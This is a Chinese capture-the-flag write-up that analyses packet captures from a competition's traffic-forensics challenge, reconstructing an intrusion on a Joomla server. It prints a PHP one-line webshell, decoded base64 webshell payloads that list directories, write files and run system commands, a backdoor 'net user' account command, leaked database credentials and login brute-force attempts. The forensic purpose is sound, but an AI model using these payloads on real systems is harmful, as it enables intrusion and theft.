[信息安全鐵人三項(xiàng)賽總決賽](數(shù)據(jù)賽)第二題

WriteUps

信息安全鐵人三項(xiàng)賽總決賽總結(jié)(企業(yè)賽)
信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第二題
 信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第三題
 信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第四題

所有題目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00002.md

首先根據(jù)隊(duì)友的發(fā)現(xiàn) , 找到了攻擊者的 ip : 172.16.10.121
然后這條命令將所有的 http 數(shù)據(jù)包的請求以及相應(yīng)全部提取出來
寫了一個 Shell 腳本 , 提取完所有的包大概也就用了兩分鐘左右的時間

tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5

#!/bin/bash

target_file='http.txt'
target_folder='http'

mkdir ${target_folder}
touch ${target_folder}/${target_file}

for file in `ls *.pcap`;
do
    echo "Dumping http package in ${file}..."
    tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r $file > ${target_folder}/${file}.txt
    echo "${file} Done!"
done

for file in `ls ${target_folder}/*.txt`;
do
    cat $file >> ${target_folder}/${target_file}
done

但是如果使用 wireshark 會很費(fèi)時間
不得不感嘆命令行工具的強(qiáng)大

然后進(jìn)入 http 文件夾
直接搜索各種web攻擊方式常見的關(guān)鍵字即可
比如如下幾道題目 :

詢問攻擊者進(jìn)行內(nèi)網(wǎng)端口掃描的IP范圍
第一題 , 想到攻擊者進(jìn)行內(nèi)網(wǎng)滲透 , 可能會使用到 reGeorg 這個工具
其中很重要的關(guān)鍵字就是 tunnel , tunnel.php , tunnel.nosocket.php
嘗試進(jìn)行搜索

grep -r -n 'tunnel.php' http.txt

發(fā)現(xiàn)很多類似下面的結(jié)果 :

POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21

事實(shí)上如果大家對 reGeorg 熟悉的話 , 直接就可以搜索關(guān)鍵字 :

?cmd=connect&target=

因?yàn)?reGeorg 在建立一個新的 TCP 鏈接的時候會使用這樣的接口

grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'

image.png

grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq

這條命令就可以解決這個問題了 :

image.png

答案 : 192.168.28.120-192.168.28.135

攻擊者第一次使用的 webshell 的鏈接密碼
既然是 webshell , 又是 php 的網(wǎng)站
那就直接先搜索 eval / assert 之類的關(guān)鍵字

grep -n 'eval(' [0-9]*.txt

image.png

由于主辦方提供的數(shù)據(jù)包已經(jīng)是時間順序
那么在外網(wǎng)滲透測試的時候使用的 webshell 鏈接密碼必然是 : Jshell
內(nèi)網(wǎng)滲透測試應(yīng)該是 Bshell 或者 cmd_shell

攻擊者在內(nèi)網(wǎng)滲透過程中BlueCMS使用的 webshell 鏈接密碼
答案 : Bshell
內(nèi)網(wǎng) bluecms 的第一個網(wǎng)絡(luò)適配器的ip
網(wǎng)絡(luò)適配器的 IP
那么可能是執(zhí)行了系統(tǒng)的 ipconfig 或者 ifconfig 命令
可以直接 grep 一下這些命令的關(guān)鍵字

image.png

答案 : 192.168.20.117

是一臺 Windows 服務(wù)器

攻擊者在內(nèi)網(wǎng)添加了一個用戶 , 求用戶名密碼
既然是 Windows 服務(wù)器 , 那么添加用戶的命令當(dāng)然是 net user [USERNAME] [PASSWORD] /add 了

image.png

cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'

image.png

net user hacker hacker /add

做到這里 , 我認(rèn)為還是不要著急做題 , 先分析攻擊者攻擊流程比較好
首先從一句話木馬入手
首先看 JShell

image.png

grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'

with open("shell") as f:
    for line in f:
        import urllib
        print "-" * 32
        data = ("Jshell=@eval(ba" + urllib.unquote(line)[16:-1])
        print data
        data = data.split("&")
        for i in data[1:]:
            d = i.split("=")
            key = d[0]
            value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
            try:
                print "%s=%s" % (key, value.decode("base64"))
            except:
                print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))

image.png

['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 獲取操作系統(tǒng)信息以及用戶名

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 讀取目錄 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件
y.P.l.l...Rb.P.......8 12:47:10 1212    0666
LICENSE.txt 2015-09-08 12:47:10 18092   0666
README.txt  2015-09-08 12:47:10 4213    0666
robots.txt  2015-09-08 12:47:10 842 0666
web.config.txt  2015-09-08 12:47:10 1690    0666

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcdHVubmVsLnBocA==', 'z2=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// 上傳文件到 C:\\phpstudy\\WWW\\joomla\\tunnel.php

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// 讀取目錄 C:\\phpstudy\\WWW\\joomla\\ 下的所有文件

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 netstat -an | find "ESTABLISHED"
第二題 ?? strings *.pcap | grep ESTABLISHED                                    
->|  TCP    127.0.0.1:1629         127.0.0.1:3306         ESTABLISHED
  TCP    127.0.0.1:3306         127.0.0.1:1629         ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.115:1628     ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62858    ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62859    ESTABLISHED
  TCP    192.168.20.117:1628    172.16.10.115:80       ESTABLISHED
  TCP    192.168.28.130:2318    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:2322    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:3473    192.168.28.131:21      ESTABLISHED

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 whoami
admin-6ef5d71ed\administrator

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZpcGNvbmZpZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.28.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
[S]
C:\phpstudy\WWW\joomla
[E] 
|<-

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 net user hacker hacker /addd
// 語法錯誤執(zhí)行失敗
->|.... /ADDD ......
 
..............:
 
 
NET USER 
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
 
...... NET HELPMSG 3506 ..................
 
[S]

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 net user hacker hacker /add
執(zhí)行成功

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcY29uZmlndXJhdGlvbi5waHA=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 讀取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件內(nèi)容
->|<?php
class JConfig {
    public $offline = '0';
    public $offline_message = '.....................<br /> ..................';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'test';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'mysqlpasswd';
    public $db = 'joomla';
    public $dbprefix = 'shf76_';
    public $live_site = '';
    public $secret = 'BjbqVIMNAt3nB7Dc';
    public $gzip = '0';
    public $error_reporting = 'default';
    public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&k
17:22:31.607905 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [.], seq 4381:5841, ack 769, win 63471, length 1460: HTTP
E...|.@........u..
y.P.....T...8P.......eyref=Help{major}{minor}:{keyref}';
    public $ftp_host = '';
    public $ftp_port = '';
    public $ftp_user = '';
    public $ftp_pass = '';
    public $ftp_root = '';
    public $ftp_enable = '0';
    public $offset = 'UTC';
    public $mailonline = '1';
    public $mailer = 'mail';
    public $mailfrom = 'admin@123.com';
    public $fromname = 'test';
    public $sendmail = '/usr/sbin/sendmail';
    public $smtpauth = '0';
    public $smtpuser = '';
    public $smtppass = '';                                                                                                           
    public $smtphost = 'localhost';
    public $smtpsecure = 'none';
    public $smtpport = '25';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $MetaDesc = 'sssss';
    public $MetaKeys = '';
    public $MetaTitle = '1';
    public $MetaAuthor = '1';
    public $MetaVersion = '0';
    public $robots = '';
    public $sef = '1';
    public $sef_rewrite = '0';
    public $sef_suffix = '0';
    public $unicodeslugs = '0';
    public $feed_limit = '10';
    public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
    public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
    public $lifetime = '15';
    public $session_handler = 'database';
    public $memcache_persist = '1';
    public $memcache_compress = '0';
    public $memcache_server_host = 'localhost';
    public $memcache_server_port = '11211';
    public $memcached_persist = '1';
    public $memcached_compress = '0';
    public $memcached_server_host = 'localhost';
    public $memcached_server_port = '11211';
    public $redis_persist = '1';
    public $redis_server_host = 'localhost';
    pub
17:22:31.622948 IP 192.168.20.117.http > 172.16.10.121.63886: Flags [FP.], seq 5841:6540, ack 769, win 63471, length 699: HTTP
E...|.@........u..
y.P.........8P...H^..lic $redis_server_port = '6379';
    public $redis_server_auth = '';
    public $redis_server_db = '0';
    public $proxy_enable = '0';
    public $proxy_host = '';
    public $proxy_port = '';
    public $proxy_user = '';
    public $proxy_pass = '';
    public $massmailoff = '0';
    public $MetaRights = '';
    public $sitename_pagetitles = '0';
    public $force_ssl = '0';
    public $session_memcache_server_host = 'localhost';
   public $session_memcache_server_port = '11211';
   public $session_memcached_server_host = 'localhost';
   public $session_memcached_server_port = '11211';
   public $frontediting = '1';
   public $feed_email = 'author';
   public $cookie_domain = '';
   public $cookie_path = '';
   public $asset_id = '1';
|<-


--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=C:\\\\phpstudy\\\\WWW\\\\joomla\\\\configuration.php']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// 讀取 C:\\phpstudy\\WWW\\joomla\\configuration.php 文件內(nèi)容

看一下這個 Jshell 是如何被寫入服務(wù)器的

image.png

前三行應(yīng)該就是利用漏洞將文件內(nèi)容寫入

image.png

可以看到 , 攻擊者利用了文件

/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA

編輯了 index.php ("L2luZGV4LnBocA".decode("base64") == "index.php") 文件

image.png

在 index 中插入一行

<?php eval($_POST['Jshell']);?>

繼續(xù)向上回溯 , 攻擊者如何登錄 ?

http ?? grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'                                                                                             
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
